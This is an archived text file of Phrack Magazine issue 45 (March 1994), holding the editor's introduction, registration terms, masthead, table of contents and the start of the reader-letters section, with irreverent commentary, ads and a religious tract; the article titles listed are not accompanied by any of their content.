home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 45.sit / Phrack Issue 45 next >
Text File  |  1997-06-06  |  882KB  |  19,603 lines

  1.                               ==Phrack Magazine==
  2.  
  3.                    Volume Five, Issue Forty-Five, File 1 of 28
  4.  
  5.                                  Issue 45 Index
  6.                               ___________________
  7.  
  8.                                P H R A C K   4 5
  9.  
  10.                                  March 30, 1994
  11.                               ___________________
  12.  
  13.                        ~ Dedicated to CRS--(1969-1994) ~
  14.  
  15. Well kiddies, it's Easter time again.  Easter has got to be one of my
  16. favorite holidays of the bunch.  No, no, no...not for any of that spiritual
  17. rebirth or religious hooey.  Easter brings with it two of the most joyous
  18. items in the world:  Reese's Peanut Butter Eggs and Marshmallow Peeps.
  19.  
  20. In the past two weeks I have eaten my body weight many times over
  21. in peanut butter eggs.  I don't know what it is about those damn things, but
  22. I just can't stop eating them.  And the Peeps?  Oh man, if you haven't put
  23. a Marshmallow Peep in the microwave, you just haven't lived.  The cute
  24. little yellow duckie takes on whole new dimensions as it becomes superheated
  25. in the nuclear nightmare of a conventional microwave oven.  It becomes
  26. like a scene from Akira as the Peep grows at an alarming rate, almost filling
  27. up the entire oven with its grossly mutated form.  You can almost hear
  28. it squealing with agony.  Go do it right now, and then finish reading this
  29. issue.
  30.  
  31. The net has been more fun the past few months than a barrel full of monkeys,
  32. (or a hottub full of co-eds, pick your own comparison).  In the time since
  33. last issue I have been the subject of a lot of attention.  I've been
  34. pseudo-framed for hacking a handful of sites with fake syslog messages, I've
  35. been spoofed as the source of a pre-release CERT advisory, I've been
  36. mentioned in numerous altered motd files on many systems, and even better,
  37. spoofed messages from "erikb@mindvox.phantom.com" were posted to a
  38. homosexual listserv announcing my supposed "exit from the closet."
  39.  
  40. Well, unfortunately for everyone, including the hundreds of hopeful gay
  41. respondents to the forged post, I only like women.  But it sure is nice to
  42. know that even men are into me.  What an ego boost.  Seriously though, one
  43. has to wonder how the forgers knew that something called queernet.org
  44. even existed.  I think I get around on the net, but I'd never heard of it.
  45. Have you?  Perhaps the Posse are 'closer' than we thought.
  46.  
  47. And the abuse continues.  God knows why.  The common thread seems to be:
  48. "Erikb is a nark."  Let's look at that logic, shall we?  If Erikb is a
  49. nark, then he would be on some terms with law enforcement.  If he were
  50. on some terms with law enforcement, then he would have no qualms about
  51. handing over names of people doing bad things.  If had no qualms about
  52. handing over names of people doing bad things, then law enforcement would
  53. open cases based on that information.  If law enforcement opened cases based
  54. on that information, then people would get raided.  If people would get
  55. raided, then people would almost certainly go to jail.
  56.  
  57. Why on earth would someone want to evoke a chain of events that would
  58. land them in jail?  Or do they not believe their own statements about
  59. me being a nark?  Or are they convinced that they are so good that
  60. they cannot get caught?  Or are they just pathetically stupid?
  61.  
  62. Personally I choose the latter.  These guys are not good.  And they are
  63. very dumb.  They make more mistakes than I've seen in a long time.  And
  64. they've pissed off very powerful people.  (No, I'm not including myself in
  65. that list of 'Powerful People.')  It's good that much of MOD is getting out
  66. of jail soon.  Now those guys were legitimately GOOD HACKERS.  They were
  67. definitely assholes, but damn good computer hackers.  It will be nice to have
  68. some harassment from dickheads with skills once again.
  69.  
  70. But I digress.
  71.  
  72. Phrack's gotten a bit of notice as of late.  In Mondo-2000, in their
  73. "Pirate Media" article, and in Richard Kadrey's "Covert Culture"
  74. sourcebook.  Of course both of these got the subscription information
  75. wrong, but hell, I've learned to expect as much.  Also, the mention
  76. of Phreak Accident's fantastic "Playing Hide & Seek -- Unix Style"
  77. article in Dan Farmer and Weitse Venema's "Improving The Security of
  78. Your Site by Breaking Into It" article brought in hundreds of
  79. new subscribers.  Let's see how many of these security people register.
  80. (How many fingers am I holding up?)
  81.  
  82. Speaking of such, Phrack has a couple of other registrations now.  One is a
  83. teacher who wanted to use Phrack in her class.  Kudos to her!  The other was
  84. a cool guy who just wanted to register because he felt like it.  Why
  85. can't the rest of you be more like him?
  86.  
  87. Anyway, the money is going to sponsor a new contest.  (Considering how
  88. well the last one went...not!)  This time, we are serious, so read in
  89. LINE NOISE for more info.
  90.  
  91. What else?  Phrack has now made the big time in the Federal Penal system.
  92. We're the proud recipients of the Bureau of Prisons form 328(58).  Our
  93. material was considered to be a breach of security of the institution.
  94. This, of course, pissed me off.  But hell, on the same form, they
  95. denote how "Body Hair, Plant Shavings, and Sexually Explicit Personal
  96. Photos" are also inappropriate.  Phrack or Body Hair.  You make the call.
  97.  
  98. Phrack 45...let's see...
  99.  
  100. If this issue doesn't cause neck hairs to bristle on everyone within spying
  101. distance of the beltway, I will be very disappointed.  It's amazing what you
  102. find in your mailbox.
  103.  
  104. We've got a lot of nifty things in this issue.  More source code for
  105. you to play with, uuencoded goodness, cellular info, telco / pbx info,
  106. Ho Ho Con coverage, ancient hack memorabilia, and a plethora of spurious
  107. scatological material.  (translated:  lots of other crap)
  108.  
  109. Enjoy.
  110.  
  111. -------------------------------------------------------------------------
  112.  
  113.                         READ THE FOLLOWING
  114.  
  115.                 IMPORTANT REGISTRATION INFORMATION
  116.  
  117. Corporate/Institutional/Government:  If you are a business,
  118. institution or government agency, or otherwise employed by,
  119. contracted to or providing any consultation relating to computers,
  120. telecommunications or security of any kind to such an entity, this
  121. information pertains to you.
  122.  
  123. You are instructed to read this agreement and comply with its
  124. terms and immediately destroy any copies of this publication
  125. existing in your possession (electronic or otherwise) until
  126. such a time as you have fulfilled your registration requirements.
  127. A form to request registration agreements is provided
  128. at the end of this file.  Cost is $100.00 US per user for
  129. subscription registration.  Cost of multi-user licenses will be
  130. negotiated on a site-by-site basis.
  131.  
  132. Individual User:  If you are an individual end user whose use
  133. is not on behalf of a business, organization or government
  134. agency, you may read and possess copies of Phrack Magazine
  135. free of charge.  You may also distribute this magazine freely
  136. to any other such hobbyist or computer service provided for
  137. similar hobbyists.  If you are unsure of your qualifications
  138. as an individual user, please contact us as we do not wish to
  139. withhold Phrack from anyone whose occupations are not in conflict
  140. with our readership.
  141.  
  142. _______________________________________________________________
  143.  
  144. Phrack Magazine corporate/institutional/government agreement
  145.  
  146.    Notice to users ("Company"):  READ THE FOLLOWING LEGAL
  147. AGREEMENT.  Company's use and/or possession of this Magazine is
  148. conditioned upon compliance by company with the terms of this
  149. agreement.  Any continued use or possession of this Magazine is
  150. conditioned upon payment by company of the negotiated fee
  151. specified in a letter of confirmation from Phrack Magazine.
  152.  
  153.    This magazine may not be distributed by Company to any
  154. outside corporation, organization or government agency.  This
  155. agreement authorizes Company to use and possess the number of copies
  156. described in the confirmation letter from Phrack Magazine and for which
  157. Company has paid Phrack Magazine the negotiated agreement fee.  If
  158. the confirmation letter from Phrack Magazine indicates that Company's
  159. agreement is "Corporate-Wide", this agreement will be deemed to cover
  160. copies duplicated and distributed by Company for use by any additional
  161. employees of Company during the Term, at no additional charge.  This
  162. agreement will remain in effect for one year from the date of the
  163. confirmation letter from Phrack Magazine authorizing such continued use
  164. or such other period as is stated in the confirmation letter (the "Term").
  165. If Company does not obtain a confirmation letter and pay the applicable
  166. agreement fee, Company is in violation of applicable US Copyright laws.
  167.  
  168.     This Magazine is protected by United States copyright laws and
  169. international treaty provisions.  Company acknowledges that no title to
  170. the intellectual property in the Magazine is transferred to Company.
  171. Company further acknowledges that full ownership rights to the Magazine
  172. will remain the exclusive property of Phrack Magazine and Company will
  173. not acquire any rights to the Magazine except as expressly set
  174. forth in this agreement.  Company agrees that any copies of the
  175. Magazine made by Company will contain the same proprietary
  176. notices which appear in this document.
  177.  
  178.     In the event of invalidity of any provision of this agreement,
  179. the parties agree that such invalidity shall not affect the validity
  180. of the remaining portions of this agreement.
  181.  
  182.     In no event shall Phrack Magazine be liable for consequential, incidental
  183. or indirect damages of any kind arising out of the delivery, performance or
  184. use of the information contained within the copy of this magazine, even
  185. if Phrack Magazine has been advised of the possibility of such damages.
  186. In no event will Phrack Magazine's liability for any claim, whether in
  187. contract, tort, or any other theory of liability, exceed the agreement fee
  188. paid by Company.
  189.  
  190.     This Agreement will be governed by the laws of the State of Texas
  191. as they are applied to agreements to be entered into and to be performed
  192. entirely within Texas.  The United Nations Convention on Contracts for
  193. the International Sale of Goods is specifically disclaimed.
  194.  
  195.     This Agreement together with any Phrack Magazine
  196. confirmation letter constitute the entire agreement between
  197. Company and Phrack Magazine which supersedes any prior agreement,
  198. including any prior agreement from Phrack Magazine, or understanding,
  199. whether written or oral, relating to the subject matter of this
  200. Agreement.  The terms and conditions of this Agreement shall
  201. apply to all orders submitted to Phrack Magazine and shall supersede any
  202. different or additional terms on purchase orders from Company.
  203.  
  204. _________________________________________________________________
  205.  
  206.             REGISTRATION INFORMATION REQUEST FORM
  207.  
  208.  
  209. We have approximately __________ users.
  210.  
  211. Enclosed is  $________
  212.  
  213. We desire Phrack Magazine distributed by (Choose one):
  214.  
  215. Electronic Mail: _________
  216. Hard Copy:       _________
  217. Diskette:        _________  (Include size & computer format)
  218.  
  219.  
  220. Name:_______________________________  Dept:____________________
  221.  
  222. Company:_______________________________________________________
  223.  
  224. Address:_______________________________________________________
  225.  
  226. _______________________________________________________________
  227.  
  228. City/State/Province:___________________________________________
  229.  
  230. Country/Postal Code:___________________________________________
  231.  
  232. Telephone:____________________   Fax:__________________________
  233.  
  234.  
  235. Send to:
  236.  
  237. Phrack Magazine
  238. 603 W. 13th #1A-278
  239. Austin, TX 78701
  240. -----------------------------------------------------------------------------
  241.  
  242.  
  243. Enjoy the magazine.  It is for and by the hacking community.  Period.
  244.  
  245.  
  246.       Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
  247.                 3L33t : CERT  (not)
  248.                  News : Datastream Cowboy
  249.          Do Not Taunt : Happy Fun Ball
  250.           Photography : dFx
  251.              Dolomite : Rudy Ray Moore
  252.     Prison Consultant : Co / Dec
  253.      A Hacker's Dream : The L0PHT
  254.             Thanks To : H.B. Reese Candy Co., Control C, Seven Up, Emmanuel
  255.                         Goldstein, The U.S. Government, The Omega, White
  256.                         Knight, Quentin, Manny Farber, Raoul, Video Games
  257.                         Magazine, Co/Dec, Darth Vader, Charlie X, The Fixer,
  258.                         Optik Nerve, Dr. Delam, Data King, Opticon the
  259.                         Disassembled
  260.  
  261.  
  262. "You're not too smart.  I like that in a hacker."
  263. (With apologies to Kathleen Turner)
  264.  
  265. Phrack Magazine V. 5, #45, March 30, 1994.     ISSN 1068-1035
  266. Contents Copyright (C) 1994 Phrack Magazine, all rights reserved.
  267. Nothing may be reproduced in whole or in part without written
  268. permission of the Editor-In-Chief.  Phrack Magazine is made available
  269. quarterly to the amateur computer hobbyist free of charge.  Any
  270. corporate, government, legal, or otherwise commercial usage or
  271. possession (electronic or otherwise) is strictly prohibited without
  272. prior registration, and is in violation of applicable US Copyright laws.
  273. To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
  274. the list.
  275.  
  276.                     Phrack Magazine
  277.                     603 W. 13th #1A-278       (Phrack Mailing Address)
  278.                     Austin, TX 78701
  279.  
  280.                     ftp.netsys.com            (Phrack FTP Site)
  281.                     /pub/phrack
  282.  
  283.                     phrack@well.sf.ca.us      (Phrack E-mail Address)
  284.                  or phrackmag@aol.com
  285.  
  286. Submissions to the above email address may be encrypted
  287. with the following key : (Not that we use PGP or encourage its
  288. use or anything.  Heavens no.  That would be politically-incorrect.
  289. Maybe someone else is decrypting our mail for us on another machine
  290. that isn't used for Phrack publication.  Yeah, that's it.   :) )
  291.  
  292. -----BEGIN PGP PUBLIC KEY BLOCK-----
  293. Version: 2.3a
  294.  
  295. mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
  296. ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
  297. a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
  298. tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
  299. =q2KB
  300. -----END PGP PUBLIC KEY BLOCK-----
  301.  
  302.  
  303.   -= Phrack 45 =-
  304.  Table Of Contents
  305.  ~~~~~~~~~~~~~~~~~
  306.  1.  Introduction by The Editor                               17 K
  307.  2.  Phrack Loopback Part I                                   31 K
  308.  3.  Phrack Loopback Part II / Editorial                      40 K
  309.  4.  Line Noise Part I                                        49 K
  310.  5.  Line Noise Part II                                       50 K
  311.  6.  Line Noise Part III                                      59 K
  312.  7.  Phrack Prophile on Control C                             22 K
  313.  8.  Running a BBS on X.25 by Seven Up                        15 K
  314.  9.  No Time for Goodbyes by Emmanuel Goldstein               21 K
  315.  10. Security Guidelines                                      55 K
  316.  11. Ho Ho Con Miscellany by Various Sources                  32 K
  317.  12. Quentin Strikes Again by The Omega and White Knight      28 K
  318.  13. 10th Chaos Computer Congress by Manny E. Farber          23 K
  319.  14. Defcon II information                                    26 K
  320.  15. VMS Information by Various Sources                       34 K
  321.  16. DCL BBS PROGRAM by Raoul                                 23 K
  322.  17. Hollywood-Style Bits & Bytes by Richard Goodwin          50 K
  323.  18. Fraudulent Applications of 900 Services by Co/Dec        15 K
  324.  19. Screwing Over Your Local McDonald's by Charlie X         20 K
  325.  20. The Senator Markey Hearing Transcripts                   72 K
  326.  21. The Universal Data Converter by Maldoror                 45 K
  327.  22. BOX.EXE - Box Program for Sound Blaster by The Fixer     13 K
  328.  23. Introduction To Octel's ASPEN by Optik Nerve             12 K
  329.  24. Radio Free Berkeley Information                          35 K
  330.  25. The MCX7700 PABX System by Dr. Delam                     22 K
  331.  26. Cellular Debug Mode Commands by Various Sources          13 K
  332.  27. International Scenes by Various Sources                  63 K
  333.  28. Phrack World News by Datastream Cowboy                   17 K
  334.  
  335.                                                     Total:   902 K
  336.  
  337. _______________________________________________________________________________
  338.  
  339.      "You can't hold a man down without staying down with him."
  340.      (Booker T. Washington)
  341.  
  342.      "I am not one of those weak-spirited, sappy Americans who want
  343.      to be liked by all the people around them.  I don't care if people
  344.      hate my guts; I assume most of them do.  The important question
  345.      is:  'What are they in a position to do about it?'"
  346.      (William S. Burroughs)
  347.                               ==Phrack Magazine==
  348.  
  349.                  Volume Five, Issue Forty-Five, File 2 of 28
  350.  
  351. ****************************************************************************
  352.  
  353.                             Phrack Loopback Part I
  354.  
  355. Letter from Louis Cypher  (Byron York)
  356.  
  357. As many people know, I was convicted over the summer for a number of
  358. Federal crimes including counterfeiting, burglary of a post office,
  359. theft of US mail, and possession of stolen property. For a little
  360. background, I was arrested for these crimes in September of 1992.
  361. I stayed out on 50,000 dollar bond until the trial which started the
  362. day after Summercon 93'. The trial lasted for about a week and a half,
  363. and the jury found me guilty on 4 charges and acquitted me on 2.
  364.  
  365. My sentencing was not until the 8th of November, and the results
  366. were not as I had hoped for being a first time offender and all.
  367. I received a 21 month sentence that will be carried out if I do
  368. not complete 6 months in a Federal boot camp in Pennsylvania.
  369. If I do complete the program at the boot camp I will then spend
  370. 6 months in a Federal halfway house in Houston. This will be
  371. followed by several months of home confinement, then 3 years
  372. parole. I am to attend college while on parole, but if I do not
  373. do well, then I have to do 300 hours of community service.
  374.  
  375. I will start serving my sentence as early as December, or as late
  376. January. Won't know until I receive the letter in the mail from
  377. the Bureau of Prisons. I am still out on bond and am on voluntary
  378. surrender so I just deliver myself to wherever they send me. A lot
  379. better than rotting in county jail until they transfer me.
  380.  
  381. I will hopefully be out still for HoHocon, and will be able to
  382. say good-bye to most people in person. But in case I am not, then
  383. I would like to use this forum to tell everyone good-bye. I know
  384. that I am not going away forever, but I don't know when I am
  385. going to be able to access a modem again and get back in touch
  386. with everybody.
  387.  
  388. I have been running a public access Internet site in Houston
  389. for the past year or so, and luckily, thanks to Drunkfux,
  390. Absalom, and Lord Macduff, the system will most probably
  391. stay up in my absence. People will be able to mail me there,
  392. and I will be able to respond through the help of people over
  393. the phone.
  394.  
  395. I would like to thank Erik Bloodaxe for letting me use Phrack
  396. to tell everybody farewell. I hope nothing's changed when I get
  397. back, and I will be back. I'll just have to keep my nose a little
  398. cleaner when I come back from my sabbatical.
  399.  
  400. It's been great, and I'll see all of you hopefully in about
  401. a year or so.
  402.  
  403.  
  404. [Byron did get to go to HoHoCon, but shortly thereafter had to fly to
  405.  Pennsylvania to enter Boot Camp.
  406.  
  407.  Byron's Address in prison is:
  408.  
  409.         J.C.C.
  410.         Byron York  60177-079
  411.         P.O. Box 1000
  412.         Lewisburg, PA 17837-1000
  413.  
  414.  Drop him a note.  It really makes the day go by a little easier in
  415.  a world of bloody shank wars with the Texas Syndicate.  Jail sucks.]
  416.  
  417. ------------------------------------------------------------------------------
  418.  
  419. [Ad for Jolly Roger T-Shirt]
  420.  
  421. >[God bless the free enterprise system!
  422. > God bless capitalism!
  423. > God bless America!]
  424.  
  425. Well, I'm an atheist and natural law objectivist, so I'll cheer right along
  426. with you on the capitalism part! Capitalism is the only MORALLY PROPER
  427. system because it's the only system (or lack thereof) that doesn't treat
  428. people as slaves!
  429.  
  430.  
  431. [editorial]
  432.  
  433. >This is going to piss people off, but hell, that's the point of having
  434. >an editorial, eh?
  435.  
  436. I, for one, fucking loved it.
  437.  
  438. >Granted, Holland has a notoriously permissive and open society; and
  439. >indeed, Europe in general is far more laid back than the States, but
  440. >even many in the US hold these ideals close to heart.
  441.  
  442. Europe also has a great police state tradition, not to mention the common
  443. and prevailing attitude that while sex and drugs and rock and roll are okay,
  444. making money (creating wealth) is a far more heinous crime.
  445.  
  446. >...The major cons in America (HoHo, Scon) really don't charge.
  447. >They "ask" for donations.  Sure, you might get a nasty look if
  448. >you don't cough up five or ten bucks, but hell, everyone does.  They
  449. >WANT to.  A good time is worth a handful of change.  And there isn't
  450. >some awesome requirement just to get in the damn door.  Besides, losses
  451. >can always be made up by selling a plethora of crap such as t-shirts and
  452. >videos, which everyone always wants to buy.  (Hardware costs.  :) )
  453.  
  454. VOLUNTARY donations! (The Supreme Court says "our system of taxation is
  455. based on VOLUNTARY COMPLIANCE"...) There's a vast and monstrous difference
  456. between voluntary and involuntary - it's that nasty "free will thing"!
  457.  
  458. >Then there was Phrack.  Always free to the community.  Always available
  459. >for everyone's enjoyment.  Asking only that Corporate types pay a
  460. >registration fee of a hundred dollars just to keep them honest.  (They
  461. >aren't.)  Knowing full well that they are stealing it, sometimes quite
  462. >brazenly.  Resting quietly, knowing that they are just as unethical as
  463. >they ever claimed us to be.
  464.  
  465. I also love your registration requirements. Being able to claim ownership
  466. of property, intellectual or otherwise, means you dictate the terms and
  467. conditions of its use. Corporate lawyers must have had coronaries upon
  468. first sight. Only difficulty is, your ISSN number and copyright data
  469. are prima facie evidence that you contracted away rights in exchange for
  470. privilege from the state, revocable whenever the state feels like it
  471. (copyright falls under admiralty jurisdiction, not common law). You've
  472. formed an "organization" - your registration form recognizes the fact
  473. that "corporations, organizations and other artificial persons" have
  474. a lesser STATUS before the law than NATURAL INDIVIDUALS - just be who
  475. you are!
  476.  
  477. >Let me tell you something.  Information does not want to be free, my
  478. >friends.  Free neither from its restraints nor in terms of dollar value.
  479. >Information is a commodity like anything else.  More valuable than the
  480. >rarest element, it BEGS to be hoarded and priced.  Anyone who gives
  481. >something away for nothing is a moron.  (I am indeed stupid.)  I can't
  482. >fault anyone for charging as long as they don't try to rationalize their
  483. >reasoning behind a facade of excuses, all the while shouting "Information
  484. >Wants to be Free!"
  485.  
  486. AMEN, from the highest fucking rooftops! You're not stupid, you're doing it
  487. by CHOICE. You're VOLUNTARILY doing it. Free people don't NEED laws that
  488. force decisions upon them - they do what needs to be done!
  489.  
  490. >Trade secrets don't want to be free, marketing projections don't want to
  491. >be free, formulas don't want to be free, troop placements don't want to
  492. >be free, CAD designs do not want to be free, corporate financial
  493. >information doesn't want to be free, my credit report sure as hell
  494. >doesn't want to be free!
  495.  
  496. YES! YES! I HAVE WAITED FOR YEARS FOR THIS MOMENT!
  497.  
  498. [tale of the Little Red Hen]
  499.  
  500. Amen again!
  501.  
  502. This whole issue, in fact, had many great things, which I'll continue
  503. to reply to here...
  504.  
  505. [ ... 10K of commentary removed ... ]
  506.  
  507. Finally...remember how crazy people got in the years just before the turn of
  508. the first millennium (990-1000 A.D.)? It's gonna be even MORE interesting
  509. this time around!
  510.  
  511. Here's to Phrack... may you last into the 21st century! (May we ALL be so
  512. lucky...)
  513.  
  514.  
  515. [Man, that was one of the coolest letters we've ever gotten (and definitely
  516.  the longest.  I have to tell you, it does my heart good to know that we
  517.  are indeed appreciated by some of you.    We will continue to do so until
  518.  as long as humanly (or inhumanly, with my schedule) possible.]
  519.  
  520. ------------------------------------------------------------------------------
  521.  
  522. A document I found in trash......
  523.  
  524. What's Next  1993 Revenue  1993 Operating
  525.    in billions  Cash Flow in billions
  526.  
  527. AMERITECH  $11.71   $4.72
  528. Pursue in-region strategy. Push regulators for entry into long distance
  529. business.
  530.  
  531. BELL ATLANTIC  $12.99   $5.34
  532. Proceed with interactive networks linking 1.2 million homes by
  533. year-end 1995. Seek local cable partners.
  534.  
  535. BELLSOUTH  $15.88   $6.64
  536. Decide whether to invest $500 million of QVC, despite loss in
  537. Paramount fight.
  538.  
  539. NYNEX   $13.4   $5.06
  540. Proceed with $1.2 billion investment in Viacom.  Build new networks
  541. in Northeast, but only if it wins new regulatory freedom.
  542.  
  543. PACTEL   $10   $4.08
  544. Pursue in-region strategy for new personal communication services.
  545.  
  546. SOUTHWESTERN BELL $10.69   $4.08
  547. Pursue cable relationship with Cox Enterprises Inc.; complete
  548. $552 million acquisition of upstate New York cellular franchises.
  549.  
  550. USWEST   $10.29   $4.45
  551. Offer new phone services in New York cable systems; may pursue
  552. Cablevision Systems Corp. with partner Time Warner.
  553.  
  554. Total   $84.98   $34.53
  555.  
  556. Gee whiz now I really sympathize with the phone company about their petty
  557. loss on fraud.
  558.  
  559. [Fuck.  And you mean to tell me THEY can't afford a measly 100 bucks
  560.  registration fee?  Maybe them thought it was 100 Million bucks.  But
  561.  even then it's well within their grasp.  Hmm...maybe the fee should go up.]
  562.  
  563. ------------------------------------------------------------------------------
  564.  
  565.  
  566. I would like to pay respects to a fellow user on my system who was killed in
  567. the recent helicopter crash near San Jose, CA.  "Rotor" was a user-friendly
  568. d00d who would always talk your ear off about helicopter technician work.  It
  569. is a great loss to our local community.
  570.  
  571.  Call the CybernaughtG@twAy.  el33t x10^8  (408) 911-3974   Login <guest>
  572.            --------------================---------------
  573.  
  574. [I want to say I'm very sorry about your friend.  I know exactly how
  575.  you must feel.]
  576.  
  577. ------------------------------------------------------------------------------
  578.  
  579.  
  580. For immediate rebroadcast::::::::::::::::::::::
  581.  
  582. *********************************************************************
  583.                       The SenseReal Foundation
  584.   The SenseReal Foundation is a non-profit, non-organization dedicated
  585. to the preservation and free distribution of information and the
  586. promotion of the Amiga computer.  In this ever increasing police state
  587. we live in the Amiga computer is a beacon of hope.  If you buy into Big
  588. Blue you are buying into Big Brother.  The information revolution is
  589. happening now.  More and more our liberty will depend on the acquisition,
  590. processing, dissemination, and control of knowledge.  We are heading into
  591. an era when there's going to be enormous pressure to prevent further
  592. development of certain kinds of knowledge.  This situation has created
  593. the need for the......
  594.  
  595.      SenseReal Archives
  596.  
  597.   Send all kinds of information to the SenseReal archives for
  598. preservation and rebroadcast.  Send newsletters, magazines, books, 'zines,
  599. tapes, CDs, or anything at all to the address below.  Not only will
  600. your contribution be deeply appreciated, it will be preserved and
  601. made available to present and future generations.  As more powerful, small,
  602. cheap technologies are available to the masses it may increase conflict
  603. between the current power structure and those now considered to be in
  604. the underground.  Civilization as we know it is racing towards the brink,
  605. and hopefully we will survive through this current cycle, but we do
  606. not know what will face us then.  Sending The SenseReal Foundation your
  607. material is a good way of expanding the knowledge of many people.  When
  608. appropriate, information will be made available on the SenseReal BBS.....
  609.  
  610. The Haunted Mansion BBS (404)516-4732 Fri-Sun 6pm-6am
  611.  
  612.   Call this number anytime.  Primary hours are Fri-Sun 6PM-6AM but you
  613. never know when the board may be up.  If it is not online when you call, call
  614. back in 3-5 minutes and perhaps it will be.  It is primarily an Amiga board
  615. but also features message areas and a text file area that will be of
  616. interest to all.  Send postcards, bizarre items, money, and anything else
  617. to:
  618.                                           Call THE HAUNTED MANSION BBS
  619.    THE SENSEREAL FOUNDATION               (404)516-4732   Fri-Sun 6PM-6AM
  620.    6595-G ROSWELL RD. Suite #206          Or contact via the Internet:
  621.    ATLANTA,GA 30328                       Green_Ghost@neonate.atl.ga.us
  622.  
  623. All information and anything sent will be kept secret forever upon request.
  624.  
  625.  
  626. -- Via DLG Pro v1.0
  627.  
  628. [Uh, gee, little did I realize that when I bought my Amiga 500, I was joining
  629.  such a sacred brotherhood.  I wonder what my employers would think.]
  630.  
  631. ------------------------------------------------------------------------------
  632.  
  633.   So, there I am in New York City last night. We're hanging out
  634. (figuratively speaking) at The Vault, where various fetishists
  635. get together to explore the limits of aberrant human sexuality.
  636. All in all, a rather interesting place. The $30 cover was a little
  637. steep, but I would still highly recommend it. Now for my point.
  638.  
  639.   I was standing around watching two dominatrix abuse some
  640. naked, prostrate wretch when one of them started walking around
  641. giving out business cards to anyone who admitted to having a
  642. computer and an Internet feed (these are dominatrix on the
  643. cutting edge of technology, I might add). The card reads thus:
  644.  
  645. CYBEROTICA Online
  646. Ride the wave of erotic communication into the 21st century, as
  647. CYBEROTICA Online(tm) becomes your point-of-penetration into
  648. Cyberspace. Transport yourself into a universe of wild fantasy-
  649. and-fetish images, tales, and intimate, anonymous interaction with
  650. erotic-video stars, industry insiders, and thousands of open-minded
  651. people around the world.
  652. Experience CYBEROTICA Online for FREE as our VIP guest while we
  653. perfect the system, and in exchange for your valued input you'll
  654. receive added VIP privileges as we grow! Contact us today for
  655. your free Infopac and Startup Software, before this opportunity
  656. ends. 212.587.0197 fax 587.0513
  657. 80 n moore st., tribecca, ny 10013  email: steffani@echonyc.com
  658.  
  659.  
  660.   I am sure this is just a teaser to get people on-line and then
  661. start charging them, but I found it pretty interesting.
  662.  
  663. ---tabas
  664.  
  665. NOTE: I have no knowledge of or affiliation with the above
  666. organization and the posting of this message does not
  667. constitute an endorsement of perversion.
  668.  
  669. [Well, hell...now I know where to go next month when I'm back in NYC.
  670.  I wish I would have know about this place last time...the only places
  671.  I could find for even semi-serious sleeze was in Times Square, and I know
  672.  that was way too tame and trendy to be IT.  Now I know.]
  673.  
  674. ------------------------------------------------------------------------------
  675.  
  676. The earthquake in Los Angeles, California, the flood in Europe, the seemingly
  677. unstoppable war in the former Yugoslavia, the devastating fires in Australia,
  678. the flood in the Midwest of the United States of America, the devastating fires
  679. near Los Angeles, California, the rapid and appalling increase in violence in
  680. cities, towns, villages all over the world, the famines, the diseases, the rapid
  681. decline of the family unit, and the destructive earthquake in India (in 1993)
  682. are signs that this world's history is coming to a climax. The human race
  683. has trampled on God's Constitution, as given in Exodus 20:1-17 (King James
  684. Version Bible), and Jesus is coming to set things right. These rapidly
  685. accelerating signs are an indication that Jesus is coming soon (Matthew 24).
  686.  
  687. God's Holy Spirit is gradually withdrawing its protection from the earth
  688. and the devastating events you see are demonstrations of Satan's power. All
  689. those who are not guarded by God are in danger of forever losing eternal life.
  690.  
  691. If you want to know what's about to happen, please study the books of Daniel
  692. and Revelation which are located in God's Word, the Bible.  They are not
  693. sealed or closed books. They can and must be understood by all. Every word
  694. in the Bible from Genesis to Revelation is true. The Bible and the Bible only
  695. must be your guide.
  696.  
  697. When God's Law (the Constitution for the Universe) is consistently ignored,
  698. disregarded, changed, and questioned, He permits certain events to occur to
  699. wake us up.  I would urge all, wherever you are and regardless of the
  700. circumstances, to directly call on Jesus and ask Him to intervene in your life.
  701. Jesus who created this planet and every living creature in it and on it, died
  702. on the cross, was raised from the dead by God the Father, and is now in Heaven
  703. interceding for you. Jesus is the only One who can rescue us from the slavery,
  704. misery, and death Satan is causing us.
  705.  
  706. For reference I'm including God's Constitution as given in the King James
  707. Version Bible. Please note that when God says the seventh day, he means Sabbath
  708. (the 7th day of the week) not Sunday (1st day of the week).
  709.  
  710. Commandment #1:  Exodus 20:1-3 (KJV)  And God
  711.                  spake all these words, saying, I am
  712.                  the LORD thy God, which have brought
  713.                  thee out of the land of Egypt, out
  714.                  of the house of bondage. Thou shalt have
  715.                  no other gods before me.
  716.  
  717. Commandment #2:  Exodus 20:4-6 (KJV) Thou shalt not make
  718.                  unto thee any graven image, or any
  719.                  likeness of any thing that is in heaven
  720.                  above, or that is in the earth beneath,
  721.                  or that is in the water under the earth.
  722.                  And shewing mercy unto thousands of them
  723.                  that love me, and keep my commandments.
  724.  
  725. Commandment #3:  Exodus 20:7 (KJV) Thou shalt not take
  726.                  the name of the LORD thy God in vain;
  727.                  for the LORD will not hold him
  728.                  guiltless that taketh his name in vain.
  729.  
  730. Commandment #4:  Exodus 20:8-11 (KJV) Remember the sabbath
  731.                  day, to keep it holy. Six days shalt thou
  732.                  labour, and do all thy work: But the
  733.                  seventh day is the sabbath of the LORD
  734.                  thy God: in it thou shalt not do any
  735.                  work, thou, nor thy son, nor thy daughter,
  736.                  thy manservant, nor thy maidservant, nor
  737.                  thy cattle, nor thy stranger that is
  738.                  within thy gates: For in six days the
  739.                  LORD made heaven and earth, the sea, and
  740.                  all that in them is, and rested the seventh
  741.                  day: wherefore the LORD blessed the sabbath
  742.                  day, and hallowed it.
  743.  
  744. Commandment #5:  Exodus 20:12 (KJV) Honour thy father and thy
  745.                  mother: that thy days may be long upon the
  746.                  land which the LORD thy God giveth thee.
  747.  
  748. Commandment #6:  Exodus 20:13 (KJV) Thou shalt not kill.
  749.  
  750. Commandment #7:  Exodus 20:14 (KJV) Thou shalt not commit
  751.                  adultery.
  752.  
